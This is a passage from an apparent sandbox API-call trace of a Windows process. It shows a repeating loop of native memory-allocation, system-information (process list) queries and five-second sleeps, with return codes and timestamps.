ResultLength=0x0) returned 0xc0000004 [0238.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.783] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.790] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.798] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.805] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.812] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.819] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.826] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.835] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.843] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.850] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.851] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.859] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.863] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.868] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.869] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.876] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.877] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.884] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.894] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.931] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.941] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.951] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.962] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.969] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.976] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.977] NtAllocateVirtualMemory (in: 